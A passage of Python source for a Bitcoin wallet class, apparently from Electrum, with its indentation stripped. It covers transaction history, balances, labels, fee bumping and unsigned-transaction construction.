if not bitcoin.is_address(addrs[0]):
raise WalletFileException('The addresses in this wallet are not bitcoin addresses.')
def synchronize(self):
pass
def is_deterministic(self):
return self.keystore.is_deterministic()
def set_up_to_date(self, up_to_date):
with self.lock:
self.up_to_date = up_to_date
if up_to_date:
self.save_transactions(write=True)
# if the verifier is also up to date, persist that too;
# otherwise it will persist its results when it finishes
if self.verifier and self.verifier.is_up_to_date():
self.save_verified_tx(write=True)
def is_up_to_date(self):
with self.lock: return self.up_to_date
def set_label(self, name, text = None):
changed = False
old_text = self.labels.get(name)
if text:
text = text.replace("\n", " ")
if old_text != text:
self.labels[name] = text
changed = True
else:
if old_text:
self.labels.pop(name)
changed = True
if changed:
run_hook('set_label', self, name, text)
self.storage.put('labels', self.labels)
return changed
def set_fiat_value(self, txid, ccy, text):
if txid not in self.transactions:
return
if not text:
d = self.fiat_value.get(ccy, {})
if d and txid in d:
d.pop(txid)
else:
return
else:
try:
Decimal(text)
except:
return
if ccy not in self.fiat_value:
self.fiat_value[ccy] = {}
self.fiat_value[ccy][txid] = text
self.storage.put('fiat_value', self.fiat_value)
def get_fiat_value(self, txid, ccy):
fiat_value = self.fiat_value.get(ccy, {}).get(txid)
try:
return Decimal(fiat_value)
except:
return
def is_mine(self, address):
return address in self.get_addresses()
def is_change(self, address):
if not self.is_mine(address):
return False
return self.get_address_index(address)[0]
def get_address_index(self, address):
raise NotImplementedError()
def get_redeem_script(self, address):
return None
def export_private_key(self, address, password):
if self.is_watching_only():
return []
index = self.get_address_index(address)
pk, compressed = self.keystore.get_private_key(index, password)
txin_type = self.get_txin_type(address)
redeem_script = self.get_redeem_script(address)
serialized_privkey = bitcoin.serialize_privkey(pk, compressed, txin_type)
return serialized_privkey, redeem_script
def get_public_keys(self, address):
return [self.get_public_key(address)]
def add_unverified_tx(self, tx_hash, tx_height):
if tx_height in (TX_HEIGHT_UNCONFIRMED, TX_HEIGHT_UNCONF_PARENT) \
and tx_hash in self.verified_tx:
with self.lock:
self.verified_tx.pop(tx_hash)
if self.verifier:
self.verifier.remove_spv_proof_for_tx(tx_hash)
# tx will be verified only if height > 0
if tx_hash not in self.verified_tx:
with self.lock:
self.unverified_tx[tx_hash] = tx_height
def add_verified_tx(self, tx_hash, info):
# Remove from the unverified map and add to the verified map
with self.lock:
self.unverified_tx.pop(tx_hash, None)
self.verified_tx[tx_hash] = info # (tx_height, timestamp, pos)
height, conf, timestamp = self.get_tx_height(tx_hash)
self.network.trigger_callback('verified', tx_hash, height, conf, timestamp)
def get_unverified_txs(self):
'''Returns a map from tx hash to transaction height'''
with self.lock:
return dict(self.unverified_tx) # copy
def undo_verifications(self, blockchain, height):
'''Used by the verifier when a reorg has happened'''
txs = set()
with self.lock:
for tx_hash, item in list(self.verified_tx.items()):
tx_height, timestamp, pos = item
if tx_height >= height:
header = blockchain.read_header(tx_height)
# fixme: use block hash, not timestamp
if not header or header.get('timestamp') != timestamp:
self.verified_tx.pop(tx_hash, None)
txs.add(tx_hash)
return txs
def get_local_height(self):
""" return last known height if we are offline """
return self.network.get_local_height() if self.network else self.storage.get('stored_height', 0)
def get_tx_height(self, tx_hash):
""" Given a transaction, returns (height, conf, timestamp) """
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
conf = max(self.get_local_height() - height + 1, 0)
return height, conf, timestamp
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return height, 0, None
else:
# local transaction
return TX_HEIGHT_LOCAL, 0, None
def get_txpos(self, tx_hash):
"return position, even if the tx is unverified"
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
return height, pos
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return (height, 0) if height > 0 else ((1e9 - height), 0)
else:
return (1e9+1, 0)
def is_found(self):
return self.history.values() != [[]] * len(self.history)
def get_num_tx(self, address):
""" return number of transactions where address is involved """
return len(self.history.get(address, []))
def get_tx_delta(self, tx_hash, address):
"effect of tx on address"
delta = 0
# substract the value of coins sent from address
d = self.txi.get(tx_hash, {}).get(address, [])
for n, v in d:
delta -= v
# add the value of the coins received at address
d = self.txo.get(tx_hash, {}).get(address, [])
for n, v, cb in d:
delta += v
return delta
def get_tx_value(self, txid):
" effect of tx on the entire domain"
delta = 0
for addr, d in self.txi.get(txid, {}).items():
for n, v in d:
delta -= v
for addr, d in self.txo.get(txid, {}).items():
for n, v, cb in d:
delta += v
return delta
def get_wallet_delta(self, tx):
""" effect of tx on wallet """
is_relevant = False # "related to wallet?"
is_mine = False
is_pruned = False
is_partial = False
v_in = v_out = v_out_mine = 0
for txin in tx.inputs():
addr = self.get_txin_address(txin)
if self.is_mine(addr):
is_mine = True
is_relevant = True
d = self.txo.get(txin['prevout_hash'], {}).get(addr, [])
for n, v, cb in d:
if n == txin['prevout_n']:
value = v
break
else:
value = None
if value is None:
is_pruned = True
else:
v_in += value
else:
is_partial = True
if not is_mine:
is_partial = False
for addr, value in tx.get_outputs():
v_out += value
if self.is_mine(addr):
v_out_mine += value
is_relevant = True
if is_pruned:
# some inputs are mine:
fee = None
if is_mine:
v = v_out_mine - v_out
else:
# no input is mine
v = v_out_mine
else:
v = v_out_mine - v_in
if is_partial:
# some inputs are mine, but not all
fee = None
else:
# all inputs are mine
fee = v_in - v_out
if not is_mine:
fee = None
return is_relevant, is_mine, v, fee
def get_tx_info(self, tx):
is_relevant, is_mine, v, fee = self.get_wallet_delta(tx)
exp_n = None
can_broadcast = False
can_bump = False
label = ''
height = conf = timestamp = None
tx_hash = tx.txid()
if tx.is_complete():
if tx_hash in self.transactions.keys():
label = self.get_label(tx_hash)
height, conf, timestamp = self.get_tx_height(tx_hash)
if height > 0:
if conf:
status = _("{} confirmations").format(conf)
else:
status = _('Not verified')
elif height in (TX_HEIGHT_UNCONF_PARENT, TX_HEIGHT_UNCONFIRMED):
status = _('Unconfirmed')
if fee is None:
fee = self.tx_fees.get(tx_hash)
if fee and self.network and self.network.config.has_fee_mempool():
size = tx.estimated_size()
fee_per_byte = fee / size
exp_n = self.network.config.fee_to_depth(fee_per_byte)
can_bump = is_mine and not tx.is_final()
else:
status = _('Local')
can_broadcast = self.network is not None
else:
status = _("Signed")
can_broadcast = self.network is not None
else:
s, r = tx.signature_count()
status = _("Unsigned") if s == 0 else _('Partially signed') + ' (%d/%d)'%(s,r)
if is_relevant:
if is_mine:
if fee is not None:
amount = v + fee
else:
amount = v
else:
amount = v
else:
amount = None
return tx_hash, status, label, can_broadcast, can_bump, amount, fee, height, conf, timestamp, exp_n
def get_addr_io(self, address):
h = self.get_address_history(address)
received = {}
sent = {}
for tx_hash, height in h:
l = self.txo.get(tx_hash, {}).get(address, [])
for n, v, is_cb in l:
received[tx_hash + ':%d'%n] = (height, v, is_cb)
for tx_hash, height in h:
l = self.txi.get(tx_hash, {}).get(address, [])
for txi, v in l:
sent[txi] = height
return received, sent
def get_addr_utxo(self, address):
coins, spent = self.get_addr_io(address)
for txi in spent:
coins.pop(txi)
out = {}
for txo, v in coins.items():
tx_height, value, is_cb = v
prevout_hash, prevout_n = txo.split(':')
x = {
'address':address,
'value':value,
'prevout_n':int(prevout_n),
'prevout_hash':prevout_hash,
'height':tx_height,
'coinbase':is_cb
}
out[txo] = x
return out
# return the total amount ever received by an address
def get_addr_received(self, address):
received, sent = self.get_addr_io(address)
return sum([v for height, v, is_cb in received.values()])
# return the balance of a bitcoin address: confirmed and matured, unconfirmed, unmatured
def get_addr_balance(self, address):
received, sent = self.get_addr_io(address)
c = u = x = 0
local_height = self.get_local_height()
for txo, (tx_height, v, is_cb) in received.items():
if is_cb and tx_height + COINBASE_MATURITY > local_height:
x += v
elif tx_height > 0:
c += v
else:
u += v
if txo in sent:
if sent[txo] > 0:
c -= v
else:
u -= v
return c, u, x
def get_spendable_coins(self, domain, config):
confirmed_only = config.get('confirmed_only', False)
return self.get_utxos(domain, exclude_frozen=True, mature=True, confirmed_only=confirmed_only)
def get_utxos(self, domain = None, exclude_frozen = False, mature = False, confirmed_only = False):
coins = []
if domain is None:
domain = self.get_addresses()
domain = set(domain)
if exclude_frozen:
domain = set(domain) - self.frozen_addresses
for addr in domain:
utxos = self.get_addr_utxo(addr)
for x in utxos.values():
if confirmed_only and x['height'] <= 0:
continue
if mature and x['coinbase'] and x['height'] + COINBASE_MATURITY > self.get_local_height():
continue
coins.append(x)
continue
return coins
def dummy_address(self):
return self.get_receiving_addresses()[0]
def get_addresses(self):
out = []
out += self.get_receiving_addresses()
out += self.get_change_addresses()
return out
def get_frozen_balance(self):
return self.get_balance(self.frozen_addresses)
def get_balance(self, domain=None):
if domain is None:
domain = self.get_addresses()
domain = set(domain)
cc = uu = xx = 0
for addr in domain:
c, u, x = self.get_addr_balance(addr)
cc += c
uu += u
xx += x
return cc, uu, xx
def get_address_history(self, addr):
h = []
# we need self.transaction_lock but get_tx_height will take self.lock
# so we need to take that too here, to enforce order of locks
with self.lock, self.transaction_lock:
related_txns = self._history_local.get(addr, set())
for tx_hash in related_txns:
tx_height = self.get_tx_height(tx_hash)[0]
h.append((tx_hash, tx_height))
return h
def _add_tx_to_local_history(self, txid):
with self.transaction_lock:
for addr in itertools.chain(self.txi.get(txid, []), self.txo.get(txid, [])):
cur_hist = self._history_local.get(addr, set())
cur_hist.add(txid)
self._history_local[addr] = cur_hist
def _remove_tx_from_local_history(self, txid):
with self.transaction_lock:
for addr in itertools.chain(self.txi.get(txid, []), self.txo.get(txid, [])):
cur_hist = self._history_local.get(addr, set())
try:
cur_hist.remove(txid)
except KeyError:
pass
else:
self._history_local[addr] = cur_hist
def get_txin_address(self, txi):
addr = txi.get('address')
if addr and addr != "(pubkey)":
return addr
prevout_hash = txi.get('prevout_hash')
prevout_n = txi.get('prevout_n')
dd = self.txo.get(prevout_hash, {})
for addr, l in dd.items():
for n, v, is_cb in l:
if n == prevout_n:
return addr
return None
def get_txout_address(self, txo):
_type, x, v = txo
if _type == TYPE_ADDRESS:
addr = x
elif _type == TYPE_PUBKEY:
addr = bitcoin.public_key_to_p2pkh(bfh(x))
else:
addr = None
return addr
def get_conflicting_transactions(self, tx):
"""Returns a set of transaction hashes from the wallet history that are
directly conflicting with tx, i.e. they have common outpoints being
spent with tx. If the tx is already in wallet history, that will not be
reported as a conflict.
"""
conflicting_txns = set()
with self.transaction_lock:
for txin in tx.inputs():
if txin['type'] == 'coinbase':
continue
prevout_hash = txin['prevout_hash']
prevout_n = txin['prevout_n']
spending_tx_hash = self.spent_outpoints[prevout_hash].get(prevout_n)
if spending_tx_hash is None:
continue
# this outpoint has already been spent, by spending_tx
assert spending_tx_hash in self.transactions
conflicting_txns |= {spending_tx_hash}
txid = tx.txid()
if txid in conflicting_txns:
# this tx is already in history, so it conflicts with itself
if len(conflicting_txns) > 1:
raise Exception('Found conflicting transactions already in wallet history.')
conflicting_txns -= {txid}
return conflicting_txns
def add_transaction(self, tx_hash, tx, allow_unrelated=False):
assert tx_hash, tx_hash
assert tx, tx
assert tx.is_complete()
# we need self.transaction_lock but get_tx_height will take self.lock
# so we need to take that too here, to enforce order of locks
with self.lock, self.transaction_lock:
# NOTE: returning if tx in self.transactions might seem like a good idea
# BUT we track is_mine inputs in a txn, and during subsequent calls
# of add_transaction tx, we might learn of more-and-more inputs of
# being is_mine, as we roll the gap_limit forward
is_coinbase = tx.inputs()[0]['type'] == 'coinbase'
tx_height = self.get_tx_height(tx_hash)[0]
if not allow_unrelated:
# note that during sync, if the transactions are not properly sorted,
# it could happen that we think tx is unrelated but actually one of the inputs is is_mine.
# this is the main motivation for allow_unrelated
is_mine = any([self.is_mine(self.get_txin_address(txin)) for txin in tx.inputs()])
is_for_me = any([self.is_mine(self.get_txout_address(txo)) for txo in tx.outputs()])
if not is_mine and not is_for_me:
raise UnrelatedTransactionException()
# Find all conflicting transactions.
# In case of a conflict,
# 1. confirmed > mempool > local
# 2. this new txn has priority over existing ones
# When this method exits, there must NOT be any conflict, so
# either keep this txn and remove all conflicting (along with dependencies)
# or drop this txn
conflicting_txns = self.get_conflicting_transactions(tx)
if conflicting_txns:
existing_mempool_txn = any(
self.get_tx_height(tx_hash2)[0] in (TX_HEIGHT_UNCONFIRMED, TX_HEIGHT_UNCONF_PARENT)
for tx_hash2 in conflicting_txns)
existing_confirmed_txn = any(
self.get_tx_height(tx_hash2)[0] > 0
for tx_hash2 in conflicting_txns)
if existing_confirmed_txn and tx_height <= 0:
# this is a non-confirmed tx that conflicts with confirmed txns; drop.
return False
if existing_mempool_txn and tx_height == TX_HEIGHT_LOCAL:
# this is a local tx that conflicts with non-local txns; drop.
return False
# keep this txn and remove all conflicting
to_remove = set()
to_remove |= conflicting_txns
for conflicting_tx_hash in conflicting_txns:
to_remove |= self.get_depending_transactions(conflicting_tx_hash)
for tx_hash2 in to_remove:
self.remove_transaction(tx_hash2)
# add inputs
def add_value_from_prev_output():
dd = self.txo.get(prevout_hash, {})
# note: this nested loop takes linear time in num is_mine outputs of prev_tx
for addr, outputs in dd.items():
# note: instead of [(n, v, is_cb), ...]; we could store: {n -> (v, is_cb)}
for n, v, is_cb in outputs:
if n == prevout_n:
if addr and self.is_mine(addr):
if d.get(addr) is None:
d[addr] = set()
d[addr].add((ser, v))
return
self.txi[tx_hash] = d = {}
for txi in tx.inputs():
if txi['type'] == 'coinbase':
continue
prevout_hash = txi['prevout_hash']
prevout_n = txi['prevout_n']
ser = prevout_hash + ':%d' % prevout_n
self.spent_outpoints[prevout_hash][prevout_n] = tx_hash
add_value_from_prev_output()
# add outputs
self.txo[tx_hash] = d = {}
for n, txo in enumerate(tx.outputs()):
v = txo[2]
ser = tx_hash + ':%d'%n
addr = self.get_txout_address(txo)
if addr and self.is_mine(addr):
if d.get(addr) is None:
d[addr] = []
d[addr].append((n, v, is_coinbase))
# give v to txi that spends me
next_tx = self.spent_outpoints[tx_hash].get(n)
if next_tx is not None:
dd = self.txi.get(next_tx, {})
if dd.get(addr) is None:
dd[addr] = set()
if (ser, v) not in dd[addr]:
dd[addr].add((ser, v))
self._add_tx_to_local_history(next_tx)
# add to local history
self._add_tx_to_local_history(tx_hash)
# save
self.transactions[tx_hash] = tx
return True
def remove_transaction(self, tx_hash):
def remove_from_spent_outpoints():
# undo spends in spent_outpoints
if tx is not None: # if we have the tx, this branch is faster
for txin in tx.inputs():
if txin['type'] == 'coinbase':
continue
prevout_hash = txin['prevout_hash']
prevout_n = txin['prevout_n']
self.spent_outpoints[prevout_hash].pop(prevout_n, None)
if not self.spent_outpoints[prevout_hash]:
self.spent_outpoints.pop(prevout_hash)
else: # expensive but always works
for prevout_hash, d in list(self.spent_outpoints.items()):
for prevout_n, spending_txid in d.items():
if spending_txid == tx_hash:
self.spent_outpoints[prevout_hash].pop(prevout_n, None)
if not self.spent_outpoints[prevout_hash]:
self.spent_outpoints.pop(prevout_hash)
# Remove this tx itself; if nothing spends from it.
# It is not so clear what to do if other txns spend from it, but it will be
# removed when those other txns are removed.
if not self.spent_outpoints[tx_hash]:
self.spent_outpoints.pop(tx_hash)
with self.transaction_lock:
self.print_error("removing tx from history", tx_hash)
tx = self.transactions.pop(tx_hash, None)
remove_from_spent_outpoints()
self._remove_tx_from_local_history(tx_hash)
self.txi.pop(tx_hash, None)
self.txo.pop(tx_hash, None)
def receive_tx_callback(self, tx_hash, tx, tx_height):
self.add_unverified_tx(tx_hash, tx_height)
self.add_transaction(tx_hash, tx, allow_unrelated=True)
def receive_history_callback(self, addr, hist, tx_fees):
with self.lock:
old_hist = self.get_address_history(addr)
for tx_hash, height in old_hist:
if (tx_hash, height) not in hist:
# make tx local
self.unverified_tx.pop(tx_hash, None)
self.verified_tx.pop(tx_hash, None)
if self.verifier:
self.verifier.remove_spv_proof_for_tx(tx_hash)
self.history[addr] = hist
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# if addr is new, we have to recompute txi and txo
tx = self.transactions.get(tx_hash)
if tx is None:
continue
self.add_transaction(tx_hash, tx, allow_unrelated=True)
# Store fees
self.tx_fees.update(tx_fees)
def get_history(self, domain=None):
# get domain
if domain is None:
domain = self.get_addresses()
domain = set(domain)
# 1. Get the history of each address in the domain, maintain the
# delta of a tx as the sum of its deltas on domain addresses
tx_deltas = defaultdict(int)
for addr in domain:
h = self.get_address_history(addr)
for tx_hash, height in h:
delta = self.get_tx_delta(tx_hash, addr)
if delta is None or tx_deltas[tx_hash] is None:
tx_deltas[tx_hash] = None
else:
tx_deltas[tx_hash] += delta
# 2. create sorted history
history = []
for tx_hash in tx_deltas:
delta = tx_deltas[tx_hash]
height, conf, timestamp = self.get_tx_height(tx_hash)
history.append((tx_hash, height, conf, timestamp, delta))
history.sort(key = lambda x: self.get_txpos(x[0]))
history.reverse()
# 3. add balance
c, u, x = self.get_balance(domain)
balance = c + u + x
h2 = []
for tx_hash, height, conf, timestamp, delta in history:
h2.append((tx_hash, height, conf, timestamp, delta, balance))
if balance is None or delta is None:
balance = None
else:
balance -= delta
h2.reverse()
# fixme: this may happen if history is incomplete
if balance not in [None, 0]:
self.print_error("Error: history not synchronized")
return []
return h2
def balance_at_timestamp(self, domain, target_timestamp):
h = self.get_history(domain)
for tx_hash, height, conf, timestamp, value, balance in h:
if timestamp > target_timestamp:
return balance - value
# return last balance
return balance
@profiler
def get_full_history(self, domain=None, from_timestamp=None, to_timestamp=None, fx=None, show_addresses=False):
from .util import timestamp_to_datetime, Satoshis, Fiat
out = []
income = 0
expenditures = 0
capital_gains = Decimal(0)
fiat_income = Decimal(0)
fiat_expenditures = Decimal(0)
h = self.get_history(domain)
for tx_hash, height, conf, timestamp, value, balance in h:
if from_timestamp and (timestamp or time.time()) < from_timestamp:
continue
if to_timestamp and (timestamp or time.time()) >= to_timestamp:
continue
item = {
'txid':tx_hash,
'height':height,
'confirmations':conf,
'timestamp':timestamp,
'value': Satoshis(value),
'balance': Satoshis(balance)
}
item['date'] = timestamp_to_datetime(timestamp)
item['label'] = self.get_label(tx_hash)
if show_addresses:
tx = self.transactions.get(tx_hash)
item['inputs'] = list(map(lambda x: dict((k, x[k]) for k in ('prevout_hash', 'prevout_n')), tx.inputs()))
item['outputs'] = list(map(lambda x:{'address':x[0], 'value':Satoshis(x[1])}, tx.get_outputs()))
# value may be None if wallet is not fully synchronized
if value is None:
continue
# fixme: use in and out values
if value < 0:
expenditures += -value
else:
income += value
# fiat computations
if fx and fx.is_enabled():
date = timestamp_to_datetime(timestamp)
fiat_value = self.get_fiat_value(tx_hash, fx.ccy)
fiat_default = fiat_value is None
fiat_value = fiat_value if fiat_value is not None else value / Decimal(COIN) * self.price_at_timestamp(tx_hash, fx.timestamp_rate)
item['fiat_value'] = Fiat(fiat_value, fx.ccy)
item['fiat_default'] = fiat_default
if value < 0:
acquisition_price = - value / Decimal(COIN) * self.average_price(tx_hash, fx.timestamp_rate, fx.ccy)
liquidation_price = - fiat_value
item['acquisition_price'] = Fiat(acquisition_price, fx.ccy)
cg = liquidation_price - acquisition_price
item['capital_gain'] = Fiat(cg, fx.ccy)
capital_gains += cg
fiat_expenditures += -fiat_value
else:
fiat_income += fiat_value
out.append(item)
# add summary
if out:
b, v = out[0]['balance'].value, out[0]['value'].value
start_balance = None if b is None or v is None else b - v
end_balance = out[-1]['balance'].value
if from_timestamp is not None and to_timestamp is not None:
start_date = timestamp_to_datetime(from_timestamp)
end_date = timestamp_to_datetime(to_timestamp)
else:
start_date = None
end_date = None
summary = {
'start_date': start_date,
'end_date': end_date,
'start_balance': Satoshis(start_balance),
'end_balance': Satoshis(end_balance),
'income': Satoshis(income),
'expenditures': Satoshis(expenditures)
}
if fx and fx.is_enabled():
unrealized = self.unrealized_gains(domain, fx.timestamp_rate, fx.ccy)
summary['capital_gains'] = Fiat(capital_gains, fx.ccy)
summary['fiat_income'] = Fiat(fiat_income, fx.ccy)
summary['fiat_expenditures'] = Fiat(fiat_expenditures, fx.ccy)
summary['unrealized_gains'] = Fiat(unrealized, fx.ccy)
summary['start_fiat_balance'] = Fiat(fx.historical_value(start_balance, start_date), fx.ccy)
summary['end_fiat_balance'] = Fiat(fx.historical_value(end_balance, end_date), fx.ccy)
summary['start_fiat_value'] = Fiat(fx.historical_value(COIN, start_date), fx.ccy)
summary['end_fiat_value'] = Fiat(fx.historical_value(COIN, end_date), fx.ccy)
else:
summary = {}
return {
'transactions': out,
'summary': summary
}
def get_label(self, tx_hash):
label = self.labels.get(tx_hash, '')
if label is '':
label = self.get_default_label(tx_hash)
return label
def get_default_label(self, tx_hash):
if self.txi.get(tx_hash) == {}:
d = self.txo.get(tx_hash, {})
labels = []
for addr in d.keys():
label = self.labels.get(addr)
if label:
labels.append(label)
return ', '.join(labels)
return ''
def get_tx_status(self, tx_hash, height, conf, timestamp):
from .util import format_time
extra = []
if conf == 0:
tx = self.transactions.get(tx_hash)
if not tx:
return 2, 'unknown'
is_final = tx and tx.is_final()
if not is_final:
extra.append('rbf')
fee = self.get_wallet_delta(tx)[3]
if fee is None:
fee = self.tx_fees.get(tx_hash)
if fee is not None:
size = tx.estimated_size()
fee_per_byte = fee / size
extra.append(format_fee_satoshis(fee_per_byte) + ' sat/b')
if fee is not None and height in (TX_HEIGHT_UNCONF_PARENT, TX_HEIGHT_UNCONFIRMED) \
and self.network and self.network.config.has_fee_mempool():
exp_n = self.network.config.fee_to_depth(fee_per_byte)
if exp_n:
extra.append('%.2f MB'%(exp_n/1000000))
if height == TX_HEIGHT_LOCAL:
status = 3
elif height == TX_HEIGHT_UNCONF_PARENT:
status = 1
elif height == TX_HEIGHT_UNCONFIRMED:
status = 0
else:
status = 2
else:
status = 3 + min(conf, 6)
time_str = format_time(timestamp) if timestamp else _("unknown")
status_str = TX_STATUS[status] if status < 4 else time_str
if extra:
status_str += ' [%s]'%(', '.join(extra))
return status, status_str
def relayfee(self):
return relayfee(self.network)
def dust_threshold(self):
return dust_threshold(self.network)
def make_unsigned_transaction(self, inputs, outputs, config, fixed_fee=None,
change_addr=None, is_sweep=False):
# check outputs
i_max = None
for i, o in enumerate(outputs):
_type, data, value = o
if _type == TYPE_ADDRESS:
if not is_address(data):
raise Exception("Invalid bitcoin address: {}".format(data))
if value == '!':
if i_max is not None:
raise Exception("More than one output set to spend max")
i_max = i
# Avoid index-out-of-range with inputs[0] below
if not inputs:
raise NotEnoughFunds()
if fixed_fee is None and config.fee_per_kb() is None:
raise NoDynamicFeeEstimates()
for item in inputs:
self.add_input_info(item)
# change address
if change_addr:
change_addrs = [change_addr]
else:
addrs = self.get_change_addresses()[-self.gap_limit_for_change:]
if self.use_change and addrs:
# New change addresses are created only after a few
# confirmations. Select the unused addresses within the
# gap limit; if none take one at random
change_addrs = [addr for addr in addrs if
self.get_num_tx(addr) == 0]
if not change_addrs:
change_addrs = [random.choice(addrs)]
else:
# coin_chooser will set change address
change_addrs = []
# Fee estimator
if fixed_fee is None:
fee_estimator = config.estimate_fee
elif isinstance(fixed_fee, Number):
fee_estimator = lambda size: fixed_fee
elif callable(fixed_fee):
fee_estimator = fixed_fee
else:
raise Exception('Invalid argument fixed_fee: %s' % fixed_fee)
if i_max is None:
# Let the coin chooser select the coins to spend
max_change = self.max_change_outputs if self.multiple_change else 1
coin_chooser = coinchooser.get_coin_chooser(config)
tx = coin_chooser.make_tx(inputs, outputs, change_addrs[:max_change],
fee_estimator, self.dust_threshold())
else:
# FIXME?? this might spend inputs with negative effective value...
sendable = sum(map(lambda x:x['value'], inputs))
_type, data, value = outputs[i_max]
outputs[i_max] = (_type, data, 0)
tx = Transaction.from_io(inputs, outputs[:])
fee = fee_estimator(tx.estimated_size())
amount = sendable - tx.output_value() - fee
if amount < 0:
raise NotEnoughFunds()
outputs[i_max] = (_type, data, amount)
tx = Transaction.from_io(inputs, outputs[:])
# Sort the inputs and outputs deterministically
tx.BIP_LI01_sort()
# Timelock tx to current height.
tx.locktime = self.get_local_height()
run_hook('make_unsigned_transaction', self, tx)
return tx
def mktx(self, outputs, password, config, fee=None, change_addr=None, domain=None):
coins = self.get_spendable_coins(domain, config)
tx = self.make_unsigned_transaction(coins, outputs, config, fee, change_addr)
self.sign_transaction(tx, password)
return tx
def is_frozen(self, addr):
return addr in self.frozen_addresses
def set_frozen_state(self, addrs, freeze):
'''Set frozen state of the addresses to FREEZE, True or False'''
if all(self.is_mine(addr) for addr in addrs):
if freeze:
self.frozen_addresses |= set(addrs)
else:
self.frozen_addresses -= set(addrs)
self.storage.put('frozen_addresses', list(self.frozen_addresses))
return True
return False
def load_unverified_transactions(self):
# review transactions that are in the history
for addr, hist in self.history.items():
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
def start_threads(self, network):
self.network = network
if self.network is not None:
self.verifier = SPV(self.network, self)
self.synchronizer = Synchronizer(self, network)
network.add_jobs([self.verifier, self.synchronizer])
else:
self.verifier = None
self.synchronizer = None
def stop_threads(self):
if self.network:
self.network.remove_jobs([self.synchronizer, self.verifier])
self.synchronizer.release()
self.synchronizer = None
self.verifier = None
# Now no references to the synchronizer or verifier
# remain so they will be GC-ed
self.storage.put('stored_height', self.get_local_height())
self.save_transactions()
self.save_verified_tx()
self.storage.write()
def wait_until_synchronized(self, callback=None):
def wait_for_wallet():
self.set_up_to_date(False)
while not self.is_up_to_date():
if callback:
msg = "%s\n%s %d"%(
_("Please wait..."),
_("Addresses generated:"),
len(self.addresses(True)))
callback(msg)
time.sleep(0.1)
def wait_for_network():
while not self.network.is_connected():
if callback:
msg = "%s \n" % (_("Connecting..."))
callback(msg)
time.sleep(0.1)
# wait until we are connected, because the user
# might have selected another server
if self.network:
wait_for_network()
wait_for_wallet()
else:
self.synchronize()
def can_export(self):
return not self.is_watching_only() and hasattr(self.keystore, 'get_private_key')
def is_used(self, address):
h = self.history.get(address,[])
if len(h) == 0:
return False
c, u, x = self.get_addr_balance(address)
return c + u + x == 0
def is_empty(self, address):
c, u, x = self.get_addr_balance(address)
return c+u+x == 0
def address_is_old(self, address, age_limit=2):
age = -1
h = self.history.get(address, [])
for tx_hash, tx_height in h:
if tx_height <= 0:
tx_age = 0
else:
tx_age = self.get_local_height() - tx_height + 1
if tx_age > age:
age = tx_age
return age > age_limit
def bump_fee(self, tx, delta):
if tx.is_final():
raise CannotBumpFee(_('Cannot bump fee') + ': ' + _('transaction is final'))
tx = Transaction(tx.serialize())
tx.deserialize(force_full_parse=True) # need to parse inputs
inputs = copy.deepcopy(tx.inputs())
outputs = copy.deepcopy(tx.outputs())
for txin in inputs:
txin['signatures'] = [None] * len(txin['signatures'])
self.add_input_info(txin)
# use own outputs
s = list(filter(lambda x: self.is_mine(x[1]), outputs))
# ... unless there is none
if not s:
s = outputs
x_fee = run_hook('get_tx_extra_fee', self, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
s = filter(lambda x: x[1]!=x_fee_address, s)
# prioritize low value outputs, to get rid of dust
s = sorted(s, key=lambda x: x[2])
for o in s:
i = outputs.index(o)
otype, address, value = o
if value - delta >= self.dust_threshold():
outputs[i] = otype, address, value - delta
delta = 0
break
else:
del outputs[i]
delta -= value
if delta > 0:
continue
if delta > 0:
raise CannotBumpFee(_('Cannot bump fee') + ': ' + _('could not find suitable outputs'))
locktime = self.get_local_height()
tx_new = Transaction.from_io(inputs, outputs, locktime=locktime)
tx_new.BIP_LI01_sort()
return tx_new
def cpfp(self, tx, fee):
txid = tx.txid()
for i, o in enumerate(tx.outputs()):
otype, address, value = o
if otype == TYPE_ADDRESS and self.is_mine(address):
break
else:
return
coins = self.get_addr_utxo(address)
item = coins.get(txid+':%d'%i)
if not item:
return
self.add_input_info(item)
inputs = [item]
outputs = [(TYPE_ADDRESS, address, value - fee)]
locktime = self.get_local_height()
# note: no need to call tx.BIP_LI01_sort() here - single input/output
return Transaction.from_io(inputs, outputs, locktime=locktime)
def add_input_sig_info(self, txin, address):
raise NotImplementedError() # implemented by subclasses
def add_input_info(self, txin):
address = txin['address']
if self.is_mine(address):
txin['type'] = self.get_txin_type(address)
# segwit needs value to sign
if txin.get('value') is None and Transaction.is_input_value_needed(txin):
received, spent = self.get_addr_io(address)
item = received.get(txin['prevout_hash']+':%d'%txin['prevout_n'])
tx_height, value, is_cb = item
txin['value'] = value
self.add_input_sig_info(txin, address)
def add_input_info_to_all_inputs(self, tx):
if tx.is_complete():
return
for txin in tx.inputs():
self.add_input_info(txin)
def can_sign(self, tx):
if tx.is_complete():
return False
# add info to inputs if we can; otherwise we might return a false negative:
self.add_input_info_to_all_inputs(tx) # though note that this is a side-effect
for k in self.get_keystores():
if k.can_sign(tx):
return True
return False
def get_input_tx(self, tx_hash, ignore_timeout=False):
# First look up an input transaction in the wallet where it
# will likely be. If co-signing a transaction it may not have
# all the input txs, in which case we ask the network.
tx = self.transactions.get(tx_hash, None)
if not tx and self.network:
try:
tx = Transaction(self.network.get_transaction(tx_hash))
except TimeoutException as e:
self.print_error('getting input txn from network timed out for {}'.format(tx_hash))
if not ignore_timeout:
raise e
return tx
def add_hw_info(self, tx):
# add previous tx for hw wallets
for txin in tx.inputs():
tx_hash = txin['prevout_hash']
# segwit inputs might not be needed for some hw wallets
ignore_timeout = Transaction.is_segwit_input(txin)
txin['prev_tx'] = self.get_input_tx(tx_hash, ignore_timeout)
# add output info for hw wallets
info = {}
xpubs = self.get_master_public_keys()
for txout in tx.outputs():
_type, addr, amount = txout
if self.is_mine(addr):
index = self.get_address_index(addr)
pubkeys = self.get_public_keys(addr)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
info[addr] = index, sorted_xpubs, self.m if isinstance(self, Multisig_Wallet) else None
